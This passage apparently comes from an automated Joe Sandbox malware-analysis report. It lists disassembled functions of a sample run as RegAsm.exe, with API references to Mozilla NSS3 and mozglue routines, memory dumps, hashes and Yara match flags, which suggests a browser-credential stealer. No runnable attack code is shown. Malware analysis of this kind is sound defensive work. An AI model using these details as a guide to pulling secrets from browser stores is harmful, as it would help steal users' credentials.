                                                                                • String ID:
                                                                                • API String ID: 861561044-0
                                                                                • Opcode ID: 191d3eafeba9a0d0b0d20b6887fa53590d1389f058eb91f3380b7a95bb4ee786
                                                                                • Instruction ID: 57c29710958f4b17642aee8ac5bfe5348c344688606be44652af7d6559c510b0
                                                                                • Opcode Fuzzy Hash: 191d3eafeba9a0d0b0d20b6887fa53590d1389f058eb91f3380b7a95bb4ee786
                                                                                • Instruction Fuzzy Hash: 16D18F71B04B069FD718CF28C980799F7E1BF99308F01862DD8598B712EB71A965CBC2
                                                                                Function 6C7D5C50 Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount64.KERNEL32 ref: 6C7D5D40
                                                                                • EnterCriticalSection.KERNEL32(6C83F688), ref: 6C7D5D67
                                                                                • __aulldiv.LIBCMT ref: 6C7D5DB4
                                                                                • LeaveCriticalSection.KERNEL32(6C83F688), ref: 6C7D5DED
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                                                                • String ID:
                                                                                • API String ID: 557828605-0
                                                                                • Opcode ID: 1dba7b171138ce4393a0b297c44ad63ad64874172162937f4bf8906e4f5bd740
                                                                                • Instruction ID: 48c93a76e8284f7efd2df8325e03b6bb5386a8a373c2b3142f55c1054f6dbdd3
                                                                                • Opcode Fuzzy Hash: 1dba7b171138ce4393a0b297c44ad63ad64874172162937f4bf8906e4f5bd740
                                                                                • Instruction Fuzzy Hash: A1519EB1F001558FCF28CFA8C985AAEBBB1FB95308F1A5A69C815A7750D7306D45CBD0
                                                                                Function 6C95AC80 Relevance: 6.1, APIs: 4, Instructions: 126COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFD074,00000000), ref: 6C95AD13
                                                                                • memcmp.VCRUNTIME140(?,?,?), ref: 6C95AD65
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C95AD95
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C95ADC8
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Item_Util$CopyErrorZfreememcmp
                                                                                • String ID:
                                                                                • API String ID: 2638228310-0
                                                                                • Opcode ID: 70a4fbfe2e26854a7e21919c2efefc7baa131fe15327e310881fd6d93ea88be9
                                                                                • Instruction ID: 06182a6d113dffdddd6276a622ba3ef6e740b97f8e03f05fa91fc1e22c0273c7
                                                                                • Opcode Fuzzy Hash: 70a4fbfe2e26854a7e21919c2efefc7baa131fe15327e310881fd6d93ea88be9
                                                                                • Instruction Fuzzy Hash: 6441DF71A00219ABDB10DB65DC85FFEB3B8EF55708F944124EC04AB681EB30E958C6B5
                                                                                Function 6C994FF0 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000,00000000,?,?,00000001,?,6C8785D2,00000000,?,?), ref: 6C994FFD
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C99500C
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9950C8
                                                                                • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C9950D6
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: _byteswap_ulong
                                                                                • String ID:
                                                                                • API String ID: 4101233201-0
                                                                                • Opcode ID: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                • Instruction ID: 94f951b57ba4422b4f250cad76e31bfa1ab1bfaf63cf0bf94cd41fcc0cb7cd8d
                                                                                • Opcode Fuzzy Hash: c1842a32e4e7e127450c3a2af53b9f41a547574912252666c9cd46b28f398346
                                                                                • Instruction Fuzzy Hash: 744185B2A002118BCB18CF18DCD17AAB7E1BF54319B1D466DD84ACB702E775E891CB81
                                                                                Function 6C942C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_SetError.NSS3(FFFFE002,00000000,?,6C941289,?), ref: 6C942D72
                                                                                  • Part of subcall function 6C943390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C942CA7,E80C76FF,?,6C941289,?), ref: 6C9433E9
                                                                                  • Part of subcall function 6C943390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C94342E
                                                                                • PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C941289,?), ref: 6C942D61
                                                                                  • Part of subcall function 6C940B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C940B21
                                                                                  • Part of subcall function 6C940B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C940B64
                                                                                • PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C941289,?), ref: 6C942D88
                                                                                • PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C941289,?), ref: 6C942DAF
                                                                                  • Part of subcall function 6C8FB8F0: PR_CallOnceWithArg.NSS3(6CA32178,6C8FBCF0,?), ref: 6C8FB915
                                                                                  • Part of subcall function 6C8FB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C8FB933
                                                                                  • Part of subcall function 6C8FB8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C8FB9C8
                                                                                  • Part of subcall function 6C8FB8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C8FB9E1
                                                                                  • Part of subcall function 6C940A50: SECOID_GetAlgorithmTag_Util.NSS3(6C942A90,E8571076,?,6C942A7C,6C9421F1,?,?,?,00000000,00000000,?,?,6C9421DD,00000000), ref: 6C940A66
                                                                                  • Part of subcall function 6C943310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C942D1E,?,?,?,?,00000000,?,?,?,?,?,6C941289), ref: 6C943348
                                                                                  • Part of subcall function 6C9406F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C942E70,00000000), ref: 6C940701
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
                                                                                • String ID:
                                                                                • API String ID: 2288138528-0
                                                                                • Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                                • Instruction ID: 2271857fa710ce5c295a07298a022c5f5d609da55dadeecea11df4ac0faac3a4
                                                                                • Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
                                                                                • Instruction Fuzzy Hash: 593106B6900605ABDB009F74EC45BAA3B69BF6521DF144130EC149BB92F731E928C7A2
                                                                                Function 6C8D6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C8D6C8D
                                                                                • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C8D6CA9
                                                                                • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C8D6CC0
                                                                                • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C9F8FE0), ref: 6C8D6CFE
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                • String ID:
                                                                                • API String ID: 2370200771-0
                                                                                • Opcode ID: 7ccebd769519adeec5ac66be6496b92c2ed8e0948b0bb5b4e13d6bc5f61babc7
                                                                                • Instruction ID: 6b132089a401cab8e644f8ab90c47a002a61e357fd2b2419af06c9a73457c90a
                                                                                • Opcode Fuzzy Hash: 7ccebd769519adeec5ac66be6496b92c2ed8e0948b0bb5b4e13d6bc5f61babc7
                                                                                • Instruction Fuzzy Hash: 8F31C0B1A0021A9FEB18CF65D981ABFBBF5EF59248F11482DD905D7710EB31E905CBA0
                                                                                Function 6C7F6470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C7F82BC,?,?), ref: 6C7F649B
                                                                                  • Part of subcall function 6C7CCA10: malloc.MOZGLUE(?), ref: 6C7CCA26
                                                                                • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7F64A9
                                                                                  • Part of subcall function 6C7EFA80: GetCurrentThreadId.KERNEL32 ref: 6C7EFA8D
                                                                                  • Part of subcall function 6C7EFA80: AcquireSRWLockExclusive.KERNEL32(6C83F448), ref: 6C7EFA99
                                                                                • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7F653F
                                                                                • free.MOZGLUE(?), ref: 6C7F655A
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650238110.000000006C7B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7B0000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650211449.000000006C7B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650409954.000000006C82D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650456604.000000006C83E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2650533178.000000006C842000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c7b0000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
                                                                                • String ID:
                                                                                • API String ID: 3596744550-0
                                                                                • Opcode ID: 9e3e5693ff2ea886477edc7cb14921db356fd051c6d829dcae67a737cd3da2de
                                                                                • Instruction ID: ff2f1e5b6e50452d77b211a6d76f9596af711ecb7668f14158050cec8ad96e8a
                                                                                • Opcode Fuzzy Hash: 9e3e5693ff2ea886477edc7cb14921db356fd051c6d829dcae67a737cd3da2de
                                                                                • Instruction Fuzzy Hash: 6A3161B5A043159FD700DF14D98469ABBE4FF89318F10482DE85A97741DB34EA19CBD2
                                                                                Function 004117C4 Relevance: 6.1, APIs: 4, Instructions: 92stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strtok_s$H_prolog
                                                                                • String ID:
                                                                                • API String ID: 1158113254-0
                                                                                • Opcode ID: a7300a0a27632c5de22bd116855e00c6bf58f51378818c6a308a569d76598784
                                                                                • Instruction ID: f1fda809e5c24f865e8d8af3438d5cd6a3e4cc09553546deba9be0eb83488091
                                                                                • Opcode Fuzzy Hash: a7300a0a27632c5de22bd116855e00c6bf58f51378818c6a308a569d76598784
                                                                                • Instruction Fuzzy Hash: 4E21D771600605AFCB18EFA1D9C1EFBB7ACEF18314B10853FE116D65A1DB38E985C658
                                                                                Function 6C946DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_MillisecondsToInterval.NSS3(?), ref: 6C946E36
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C946E57
                                                                                  • Part of subcall function 6C97C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C97C2BF
                                                                                • PR_MillisecondsToInterval.NSS3(?), ref: 6C946E7D
                                                                                • PR_MillisecondsToInterval.NSS3(?), ref: 6C946EAA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: IntervalMilliseconds$ErrorValue
                                                                                • String ID:
                                                                                • API String ID: 3163584228-0
                                                                                • Opcode ID: fe0be01f31d3209102ee46dca54632605fe4093e9bd08e1dcc33ea80c145191e
                                                                                • Instruction ID: a85c3113ee9a90a4de7020ad4e7bf5d65da90704504bae7cb1b07143103c3a71
                                                                                • Opcode Fuzzy Hash: fe0be01f31d3209102ee46dca54632605fe4093e9bd08e1dcc33ea80c145191e
                                                                                • Instruction Fuzzy Hash: B731D5B1610612EFDB185F34DC14BA7B7E8AB1131AF14863CD499D6A81E730F868CF81
                                                                                Function 00411649 Relevance: 6.1, APIs: 4, Instructions: 78stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _EH_prolog.MSVCRT ref: 0041164E
                                                                                • strtok_s.MSVCRT ref: 00411675
                                                                                • StrCmpCA.SHLWAPI(00000000,00426564,00000001,?,?,?,00416DD9), ref: 004116B1
                                                                                  • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,004265B7,004265B6,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                  • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                • strtok_s.MSVCRT ref: 004116ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2640792644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.2640792644.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2640792644.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: strtok_s$H_prologlstrcpylstrlen
                                                                                • String ID:
                                                                                • API String ID: 539094379-0
                                                                                • Opcode ID: e04e54de1f4c428c472027806aecd0d9a346fbe0422c17b076ca8ae4093683bc
                                                                                • Instruction ID: 94ebce82879aab40b33730a641183e694e8fbbb9ae688793fb06155610798229
                                                                                • Opcode Fuzzy Hash: e04e54de1f4c428c472027806aecd0d9a346fbe0422c17b076ca8ae4093683bc
                                                                                • Instruction Fuzzy Hash: 382103B1600605ABCB14DF95D981BEFB3A8EF04315F04423FE106E65A1DB78EA488A68
                                                                                Function 6C914FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C91B60F,00000000), ref: 6C915003
                                                                                • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C91B60F,00000000), ref: 6C91501C
                                                                                • PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C91B60F,00000000), ref: 6C91504B
                                                                                • free.MOZGLUE(?,00000000,00000000,00000000,?,6C91B60F,00000000), ref: 6C915064
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalEnterSectionUnlockValuefree
                                                                                • String ID:
                                                                                • API String ID: 1112172411-0
                                                                                • Opcode ID: 38506daaaf73e7cca9c9c1f7293a08d80e35b02fab62d5db992951f3fa9b28cc
                                                                                • Instruction ID: 76e95c893aa98f36a535ae8c1aaa8d1e05f88c197229bec230d3b03efe4fe315
                                                                                • Opcode Fuzzy Hash: 38506daaaf73e7cca9c9c1f7293a08d80e35b02fab62d5db992951f3fa9b28cc
                                                                                • Instruction Fuzzy Hash: DE3116B0A0960ACFDB04EF68C48556ABBF4FF09308B158569D859D7B00E734E891CB91
                                                                                Function 6C950C00 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PK11_DigestOp.NSS3(?,?,00000004), ref: 6C950C43
                                                                                  • Part of subcall function 6C8FDEF0: TlsGetValue.KERNEL32 ref: 6C8FDF37
                                                                                  • Part of subcall function 6C8FDEF0: EnterCriticalSection.KERNEL32(?), ref: 6C8FDF4B
                                                                                  • Part of subcall function 6C8FDEF0: PR_SetError.NSS3(00000000,00000000), ref: 6C8FE02B
                                                                                  • Part of subcall function 6C8FDEF0: PR_Unlock.NSS3(?), ref: 6C8FE07E
                                                                                • PK11_DigestOp.NSS3(?,?,00000008), ref: 6C950C85
                                                                                • PK11_DigestOp.NSS3(?,?,?), ref: 6C950C9F
                                                                                • PR_SetError.NSS3(FFFFD07F,00000000), ref: 6C950CB4
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: DigestK11_$Error$CriticalEnterSectionUnlockValue
                                                                                • String ID:
                                                                                • API String ID: 3186484790-0
                                                                                • Opcode ID: 9503c854e3bd49ff0bf9447c4a62a2aa3fc073e50a0f97a9829b8f03fad2ba97
                                                                                • Instruction ID: 06f0c18cac81e9e45c0b783dbae4727da9ca16e2735d52fc9a9c3318af22173c
                                                                                • Opcode Fuzzy Hash: 9503c854e3bd49ff0bf9447c4a62a2aa3fc073e50a0f97a9829b8f03fad2ba97
                                                                                • Instruction Fuzzy Hash: 292128715042C69FCB01CF78DC05B9ABBA4AF26208F4D85A5E9485F752E731D828C7F2
                                                                                Function 6C942DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(?), ref: 6C942E08
                                                                                  • Part of subcall function 6C9314C0: TlsGetValue.KERNEL32 ref: 6C9314E0
                                                                                  • Part of subcall function 6C9314C0: EnterCriticalSection.KERNEL32 ref: 6C9314F5
                                                                                  • Part of subcall function 6C9314C0: PR_Unlock.NSS3 ref: 6C93150D
                                                                                • PORT_NewArena_Util.NSS3(00000400), ref: 6C942E1C
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C942E3B
                                                                                • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C942E95
                                                                                  • Part of subcall function 6C931200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C8D88A4,00000000,00000000), ref: 6C931228
                                                                                  • Part of subcall function 6C931200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C931238
                                                                                  • Part of subcall function 6C931200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C8D88A4,00000000,00000000), ref: 6C93124B
                                                                                  • Part of subcall function 6C931200: PR_CallOnce.NSS3(6CA32AA4,6C9312D0,00000000,00000000,00000000,?,6C8D88A4,00000000,00000000), ref: 6C93125D
                                                                                  • Part of subcall function 6C931200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C93126F
                                                                                  • Part of subcall function 6C931200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C931280
                                                                                  • Part of subcall function 6C931200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C93128E
                                                                                  • Part of subcall function 6C931200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C93129A
                                                                                  • Part of subcall function 6C931200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C9312A1
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.2650604432.000000006C851000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C850000, based on PE: true
                                                                                • Associated: 00000002.00000002.2650569482.000000006C850000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651178020.000000006C9EF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651298310.000000006CA2E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651320867.000000006CA2F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651349013.000000006CA30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 00000002.00000002.2651375717.000000006CA35000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_6c850000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
